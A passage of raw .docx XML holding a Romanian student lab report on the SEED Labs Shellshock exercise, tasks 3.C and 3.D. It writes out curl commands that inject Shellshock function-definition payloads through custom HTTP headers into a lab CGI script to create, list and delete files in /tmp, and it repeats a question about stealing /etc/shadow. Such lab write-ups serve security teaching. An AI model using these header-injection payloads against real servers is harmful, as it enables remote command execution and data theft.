          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>vul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>.cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">in ruma executiei comenzii vom obtine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>id-ul de utilizator al procesului</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>119380</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>140335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="26225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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2622550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sarcina 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t xml:space="preserve">Crearea unui fișier în </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">Ne vom folosi de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>optiunea -H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> a lui curl pentru a reusi sa cream un fisier temporar in tmp iar apoi sa listam continutul fisierului tmp printr-un alt atac </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">valoarea variabilei de mediu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BIRLUTIU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> va fi setata la valoarea: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>"(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">) { echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>salut;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>/bin/touch /tmp/BirlutiuAtac.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>comanda întreaga:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>curl -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> "BIRLUTIU: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>() { echo salut;}; echo Content_type: text/plain; echo; /bin/touch /tmp/BirlutiuAtac.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>vul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>.cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">in ruma executiei comenzii se va crea un fisier BirlutiuAtac.txt in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>directorul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="18">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>55880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>75565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="14281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943600" cy="1428115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Pentru a verifica continutul directorului /tmp vom rula urmatoarea comanda care va lista continutul acestului folder, tot prin injectarea unei variabile numite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP_BIRLUTIU2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>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"BIRLUTIU2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>() { echo salut;}; echo Content_type: text/plain; echo; /bin/ls -l /tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>vul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>.cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="19">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-142875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="21767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5943600" cy="2176780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sarcina 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t xml:space="preserve">Ștergerea fișierului din </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Pentru stergere fisierului voi face o abordare similara celei prezentate la punctul anterior </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>stergere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>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"BIRLUTIUSTERGERE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>() { echo salut;}; echo Content_type: text/plain; echo;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/rm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/BirlutiuAtac.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">" -v </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>http://www.seedlab-shellshock.com/cgi-bin/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>vul</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>afisare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>: 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"BIRLUTIUAFISARE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>() { echo salut;}; echo Content_type: text/plain; echo; /bin/ls -l /tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>vul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>.cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="20">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-8255</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>110490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="42354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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4235450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>observam ca numarul de fisiere din tmp e 0, deci fisierul BirlutiuAtac.txt s-a sters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Intrebarea 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> veti putea fura continutul fisierului/etc/shadowde pe server?  De ce da sau de ce nu? Informatiile obtinute in Sarcina 3.B ar trebui sa va ofere un indiciu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
